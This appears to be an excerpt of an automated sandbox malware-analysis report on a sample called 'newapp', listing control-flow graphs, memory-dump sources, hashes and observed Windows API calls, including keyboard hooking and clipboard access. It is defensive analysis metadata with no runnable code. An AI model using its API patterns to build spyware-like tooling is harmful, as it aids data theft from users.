                                                                                                            control_flow_graph 767 6f19237-6f1925d 769 6f1925f-6f19262 767->769 770 6f19b20-6f19b23 769->770 771 6f19268-6f1927d 769->771 772 6f19b25-6f19b44 770->772 773 6f19b49-6f19b4b 770->773 778 6f19295-6f192ab 771->778 779 6f1927f-6f19285 771->779 772->773 774 6f19b52-6f19b55 773->774 775 6f19b4d 773->775 774->769 777 6f19b5b-6f19b65 774->777 775->774 785 6f192b6-6f192b8 778->785 781 6f19287 779->781 782 6f19289-6f1928b 779->782 781->778 782->778 786 6f192d0-6f19341 785->786 787 6f192ba-6f192c0 785->787 798 6f19343-6f19366 786->798 799 6f1936d-6f19389 786->799 788 6f192c2 787->788 789 6f192c4-6f192c6 787->789 788->786 789->786 798->799 804 6f193b5-6f193d0 799->804 805 6f1938b-6f193ae 799->805 810 6f193d2-6f193f4 804->810 811 6f193fb-6f19416 804->811 805->804 810->811 816 6f19418-6f19434 811->816 817 6f1943b-6f19449 811->817 816->817 818 6f19459-6f194d3 817->818 819 6f1944b-6f19454 817->819 825 6f19520-6f19535 818->825 826 6f194d5-6f194f3 818->826 819->777 825->770 830 6f194f5-6f19504 826->830 831 6f1950f-6f1951e 826->831 830->831 831->825 831->826
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 8b52b1bd7096f1e1ed050ea57c1d1fbbb0459dfbf1e81774c179da1eb38022b9
                                                                                                            • Instruction ID: f8679591d768680ffbd08660c791fa0f6f688d53d162d29a4a0ee74ef9e18528
                                                                                                            • Opcode Fuzzy Hash: 8b52b1bd7096f1e1ed050ea57c1d1fbbb0459dfbf1e81774c179da1eb38022b9
                                                                                                            • Instruction Fuzzy Hash: DF513C30B002159FDB54DB79E9A4BAEB7F6EBC8640F108429C409EB394EA74DC42CBD5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 871 6f14c73-6f14c9c 873 6f14c9e-6f14ca1 871->873 874 6f14ca3-6f14cbd 873->874 875 6f14cc2-6f14cc5 873->875 874->875 876 6f153a4-6f153a6 875->876 877 6f14ccb-6f14dc3 875->877 879 6f153a8 876->879 880 6f153ad-6f153b0 876->880 895 6f14e46-6f14e4d 877->895 896 6f14dc9-6f14e16 call 6f1552f 877->896 879->880 880->873 882 6f153b6-6f153c3 880->882 897 6f14ed1-6f14eda 895->897 898 6f14e53-6f14ec3 895->898 909 6f14e1c-6f14e38 896->909 897->882 915 6f14ec5 898->915 916 6f14ece 898->916 913 6f14e43-6f14e44 909->913 914 6f14e3a 909->914 913->895 914->913 915->916 916->897
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: c5888ed798e7d45f11d47a77161b270e3a946374a946185f0e1e6c6172940048
                                                                                                            • Instruction ID: ed1c9162e99d80eccf70e5267619078074510d7f9f1d499263386f000ac0f44d
                                                                                                            • Opcode Fuzzy Hash: c5888ed798e7d45f11d47a77161b270e3a946374a946185f0e1e6c6172940048
                                                                                                            • Instruction Fuzzy Hash: A3515B70F002199FDB55DFB9C854BAEBAE7BFC8740F208529D10AAF395DA758C018B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 30aa2e3bf101ed57f75e509a826ee977c8aa6daf3a4acee9feff81c78212eb9b
                                                                                                            • Instruction ID: 4ee7ab24d24e488dec61d0d08d0e03f8fe22e99df0f871b8600f845924a78087
                                                                                                            • Opcode Fuzzy Hash: 30aa2e3bf101ed57f75e509a826ee977c8aa6daf3a4acee9feff81c78212eb9b
                                                                                                            • Instruction Fuzzy Hash: FBB17C70B007068FDB94EF69D89056EBBF2FF88310B108529C41A9B395DB74E946CF90
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F0686A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 817e3506d8eef2b03f5ba2a674d8b7098dcc9125115b0c85b017e59043c4263c
                                                                                                            • Instruction ID: ef46a233112a24f14f81448a2b709b6f1eaa4a8f9836bb03c69f9ccd061fce32
                                                                                                            • Opcode Fuzzy Hash: 817e3506d8eef2b03f5ba2a674d8b7098dcc9125115b0c85b017e59043c4263c
                                                                                                            • Instruction Fuzzy Hash: 0451C0B1D003199FDB14CFA9D884ADEFBB5BF88310F24862AE418AB250D7709955CF91
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F0686A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 61d3088ad9b1cd0bc31e721548d07a08661df614043a1660dcbd16faff3d0f58
                                                                                                            • Instruction ID: 64b5b6e5f69dd096b6e89749a2457f051acc45d7e24d9fe6f3b0c9e469f326fb
                                                                                                            • Opcode Fuzzy Hash: 61d3088ad9b1cd0bc31e721548d07a08661df614043a1660dcbd16faff3d0f58
                                                                                                            • Instruction Fuzzy Hash: 5C41C0B1D003099FDB14CF99C884ADEBBF5FF88310F24852AE418AB250D775A845CF91
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06F0B851
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: e108d776cfab20231de37b2a469f07a5c34908e786d5162aea3928bdc50baee2
                                                                                                            • Instruction ID: 27853fed504a706e300478d518f1c8b2d37b871f9441ae7896357e9385383bee
                                                                                                            • Opcode Fuzzy Hash: e108d776cfab20231de37b2a469f07a5c34908e786d5162aea3928bdc50baee2
                                                                                                            • Instruction Fuzzy Hash: AB4127B5D0030ACFDB54CF99C888AAABBF5FB88314F24C459D519AB361D735A841CFA0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: 0c14bf095f97c323d809b6ae6f35951ed77ed724e1b07f5476d110dda06c5eff
                                                                                                            • Instruction ID: 0f6eb6c104f67b1e2900f61aa93fc281110b4adcd03e57ad4ad4037d9539733c
                                                                                                            • Opcode Fuzzy Hash: 0c14bf095f97c323d809b6ae6f35951ed77ed724e1b07f5476d110dda06c5eff
                                                                                                            • Instruction Fuzzy Hash: 9E3136B1E01248DFEB10CFA9C984BCDBBF5AF48304F208119E404BB290DB745945CF95
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0181EFE7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2007701504.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1810000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: 7c7a30b74a431392da687794321974934d4050fc132d72e7e61f4fb572ba3496
                                                                                                            • Instruction ID: 48d98a7df6eb8a857777cec9fa421583ac6b83a122622f53ec38c3440a80aff1
                                                                                                            • Opcode Fuzzy Hash: 7c7a30b74a431392da687794321974934d4050fc132d72e7e61f4fb572ba3496
                                                                                                            • Instruction Fuzzy Hash: D1219A72C0426A9FCB10CFAAD40479EFBF4EF88310F11856AE854A7250D778AA45CFA1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: 3f4de6dd425da9c0cfea066d9861cd7ad58a26c3ee229ba34ecdf0e5ef3fb027
                                                                                                            • Instruction ID: 17130a0a83382b5b119a3a614078755f0920f8afe581ad17d6701200507b65e5
                                                                                                            • Opcode Fuzzy Hash: 3f4de6dd425da9c0cfea066d9861cd7ad58a26c3ee229ba34ecdf0e5ef3fb027
                                                                                                            • Instruction Fuzzy Hash: 943102B1E01208EFEB14DF99C984BCEBBF5AF48304F248119E405BB294DB74A985CF95
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F0A577
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 1288c0ca1417480cb90ec886d7a9bb1b6e0148281f2346ec80f11982f0e0d862
                                                                                                            • Instruction ID: c6a992e1a368df87e7407bacffc134c0972ba462e3558d6cbb3a03974415194e
                                                                                                            • Opcode Fuzzy Hash: 1288c0ca1417480cb90ec886d7a9bb1b6e0148281f2346ec80f11982f0e0d862
                                                                                                            • Instruction Fuzzy Hash: 0F21E5B5D00258AFDB10CFAAD984AEEBFF4FB49310F14801AE954A3251D375A944CFA5
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F0A577
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 661f2804f4a8f84a03b3f3d1f961268109b722b3352938cbb026a12bc1c59693
                                                                                                            • Instruction ID: 292a3282713f4ba5c6b10882ca2c4ee6412b17b52b389e9669a0c7f7feaaad4d
                                                                                                            • Opcode Fuzzy Hash: 661f2804f4a8f84a03b3f3d1f961268109b722b3352938cbb026a12bc1c59693
                                                                                                            • Instruction Fuzzy Hash: DB21E3B5D002089FDB10CF9AD984ADEBBF4FB48310F14801AE914A3251C374A940CFA5
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F0DF23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: b1d0331117c3fd160fa1cf03e3defe2116d6d2509ccd85568bba540472f3fc3f
                                                                                                            • Instruction ID: 4e08dc3218b518ede8057e012b748bb53c070ae81cc8ebd20f8194d68e657f8c
                                                                                                            • Opcode Fuzzy Hash: b1d0331117c3fd160fa1cf03e3defe2116d6d2509ccd85568bba540472f3fc3f
                                                                                                            • Instruction Fuzzy Hash: DB2115B1D002099FDB14CF99D844BEEFBF5EF88314F10842AE458A7290C774A944CFA5
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F0DF23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: 68b00b0b077f6cef17678cb66c1909745efb68198fc484241abd9c4ed57d89cd
                                                                                                            • Instruction ID: 3fc4d047176130ac8b817999cf673d7058f2bfb77bc10cfd39d43fde764463ad
                                                                                                            • Opcode Fuzzy Hash: 68b00b0b077f6cef17678cb66c1909745efb68198fc484241abd9c4ed57d89cd
                                                                                                            • Instruction Fuzzy Hash: 4E2124B1D002098FDB14CF9AD844BEEFBF5EF88320F10842AE458A7290C774A944CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 06F05716
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 8e931e275d2137513a5b62f459e8edd2b939ed7e96f337dfc83a646286f2e7c7
                                                                                                            • Instruction ID: ee7749e1a929dd223d2ddf6aea19f4cdc060776370079906daa889c012fd8d90
                                                                                                            • Opcode Fuzzy Hash: 8e931e275d2137513a5b62f459e8edd2b939ed7e96f337dfc83a646286f2e7c7
                                                                                                            • Instruction Fuzzy Hash: BE1123B5D006499FDB10DFAAD944BDEFBF4EB89320F10812AD419A7250C375A545CFA1
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0181EFE7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2007701504.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1810000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: 792f193b416c138874d92ab4b4d72164cc398d182849bcfa298d091b8c74a7f9
                                                                                                            • Instruction ID: 6cb865d16e5ec9fbb2b25ea9d3bea682dc0c97a663a0bea9545b7c1fcc660c64
                                                                                                            • Opcode Fuzzy Hash: 792f193b416c138874d92ab4b4d72164cc398d182849bcfa298d091b8c74a7f9
                                                                                                            • Instruction Fuzzy Hash: CF1123B2C006699BCB10CF9AC444BDEFBF4EF48320F15816AE818A7240D778A944CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 06F05716
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: fad06419e9ba080cd696402218e5e5736210776868cf12507070d36b9476d668
                                                                                                            • Instruction ID: 6fe1e873989ed8dc69cfd4f6d67f8ad87adb658d96997efa7c31a23ecf357c2c
                                                                                                            • Opcode Fuzzy Hash: fad06419e9ba080cd696402218e5e5736210776868cf12507070d36b9476d668
                                                                                                            • Instruction Fuzzy Hash: BB1120B6C00248CFDB10CF9AC548B9EFBF4EB89320F10802AD818B7240C3B4A545CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 06F0BFED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: bc6f26a369ca5bac9b49eda21aebe5485fef9cb30955d6016da70869ea9e5697
                                                                                                            • Instruction ID: da7f571ce6ad75cf1f7376a462db770cd015cf660096c798337ad521dfbe902f
                                                                                                            • Opcode Fuzzy Hash: bc6f26a369ca5bac9b49eda21aebe5485fef9cb30955d6016da70869ea9e5697
                                                                                                            • Instruction Fuzzy Hash: 171166B5D002488FDB20DFAAD884BDEFFF8EB49320F20845AD458A7250C335A580CFA1
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F0BAA5), ref: 06F0BB2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 61aaf38329c474acf822a87b1bca68351a0c37cef814985dc3bf3980b8e9054d
                                                                                                            • Instruction ID: d2a1f2d8cec8b09a2d245aa029fd40f09df6bcd41cb46690d7f08384493455a4
                                                                                                            • Opcode Fuzzy Hash: 61aaf38329c474acf822a87b1bca68351a0c37cef814985dc3bf3980b8e9054d
                                                                                                            • Instruction Fuzzy Hash: 111145B5C00248CFDB20DF9AD885BDEFBF8EB48324F208419D418A3240C779A940CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 06F0BFED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: cb9670a23c7d1c6c4143f26db88009689bffffda0e8bf94e25ad5f742ceb90e9
                                                                                                            • Instruction ID: ff46480e0db9e5f8069cfe93b0f82356248990137db117bca84eca83cf67c162
                                                                                                            • Opcode Fuzzy Hash: cb9670a23c7d1c6c4143f26db88009689bffffda0e8bf94e25ad5f742ceb90e9
                                                                                                            • Instruction Fuzzy Hash: F31142B5C003088FDB20DF9AD488BDEFBF8EB48320F208419E518A7250C379A944CFA5
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F0BAA5), ref: 06F0BB2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 7b31a6167dbd21e7f3ca2664148687bef1132df15ad6d11d68432a60b19f21f3
                                                                                                            • Instruction ID: 7cfb23d889f3a398e671d5e28a48a42530245d4a779fcd790da78f8f961d7ddc
                                                                                                            • Opcode Fuzzy Hash: 7b31a6167dbd21e7f3ca2664148687bef1132df15ad6d11d68432a60b19f21f3
                                                                                                            • Instruction Fuzzy Hash: 5C1133B1800348CFDB60DF9AC485BDEFBF4EB48324F20841AD519A7240C375A940CFA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: f5cb444331eec9cdb0a42e543f6507a4a460cf6b1689852d3e2c94e30406a77c
                                                                                                            • Instruction ID: 618871b16da5ec9fdc3ec65830227c4f2203f8f7781ea3249f8e402a560332d6
                                                                                                            • Opcode Fuzzy Hash: f5cb444331eec9cdb0a42e543f6507a4a460cf6b1689852d3e2c94e30406a77c
                                                                                                            • Instruction Fuzzy Hash: BF417D31E0021A9FDB64DFA5D55469EBBB2FF85380F204929E416EF340EBB1E945CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 009f43aa0748a1049920ef0527e0cbb68b6310ddaf1fac84a7d06e678c7537ef
                                                                                                            • Instruction ID: 5229b9de3268b6fdde086248b0e3cdc9429b34afb20e8d2c7c0c880e7b28e829
                                                                                                            • Opcode Fuzzy Hash: 009f43aa0748a1049920ef0527e0cbb68b6310ddaf1fac84a7d06e678c7537ef
                                                                                                            • Instruction Fuzzy Hash: 0531CF31B002068FDB999BB4E51466E7BE2BBC9640F208428D406DF394EE75DE86CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q
                                                                                                            • API String ID: 0-388095546
                                                                                                            • Opcode ID: 9dcfdb49068dbb93318383a03c969f398579e0ce30d3f1506d30bbf0a56c397e
                                                                                                            • Instruction ID: a2817f1867c97edc9b0185b725992c4dc3133bd4bb3efdfa2eada4c01b685950
                                                                                                            • Opcode Fuzzy Hash: 9dcfdb49068dbb93318383a03c969f398579e0ce30d3f1506d30bbf0a56c397e
                                                                                                            • Instruction Fuzzy Hash: 7D010432F002149FDF648A65EE446AAB7AAEB803D0F100429E926EF250DA31DE09C791
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Ocq
                                                                                                            • API String ID: 0-2995510325
                                                                                                            • Opcode ID: 577e74ffb4b9c8a17b576a518d88fb1ead53678e059ae382d59c0fa5590912f2
                                                                                                            • Instruction ID: a3712e4352d8c950529fae11335927c9e01a4abf5028b68883615f3f8caf7642
                                                                                                            • Opcode Fuzzy Hash: 577e74ffb4b9c8a17b576a518d88fb1ead53678e059ae382d59c0fa5590912f2
                                                                                                            • Instruction Fuzzy Hash: 5BF0D430E1012ADFDB14DF94E899BAEBBF2BF88741F204119E402AB294CBB45D05CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ae3b02b3fdbcac6b30bfc2405c04519ce638e1cf60915a5bc15a325c98093a6b
                                                                                                            • Instruction ID: f084bae58f53ae425f3eda25057e8df2b5c471290f7a52ad15a4374644f68d81
                                                                                                            • Opcode Fuzzy Hash: ae3b02b3fdbcac6b30bfc2405c04519ce638e1cf60915a5bc15a325c98093a6b
                                                                                                            • Instruction Fuzzy Hash: DBB1AC71F002099BDB14DFB4D894AAEB7A7EFC4754F208829D806AF344DA34EC46CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ac46a5a78c1a4d7cf3137d84b6a3066156d57335d640449ed917bd020797f57
                                                                                                            • Instruction ID: 5f216020841c55cd55a3b6d9e8d1c428bcb8a6275173910aea08805fd62449d9
                                                                                                            • Opcode Fuzzy Hash: 0ac46a5a78c1a4d7cf3137d84b6a3066156d57335d640449ed917bd020797f57
                                                                                                            • Instruction Fuzzy Hash: B1A13730E0010ACFDFA0CB68D4947ADB7B1EB45390F648966E819DF395DA35DC86CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: babe7c8c4b69164bc17a528a24bea52356be1f3527c306b14d88dcad791194cb
                                                                                                            • Instruction ID: d7ee8b7fa61400ca97ccb2772f6b9cd1dd305b240b41341211cac2ce1ead108a
                                                                                                            • Opcode Fuzzy Hash: babe7c8c4b69164bc17a528a24bea52356be1f3527c306b14d88dcad791194cb
                                                                                                            • Instruction Fuzzy Hash: E6A11530E0010ACBDFA4CA68D4847ADB7A1EB45790F64892AE819EF355DA35DC86CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6ac3ded4cba7e411848a23d730e7d81e235e15d32713a8449d0ffe5bd5bbad78
                                                                                                            • Instruction ID: c560bc58791fdee69c2a0bf003133d62d814752c7bf944f45903ca473c07338d
                                                                                                            • Opcode Fuzzy Hash: 6ac3ded4cba7e411848a23d730e7d81e235e15d32713a8449d0ffe5bd5bbad78
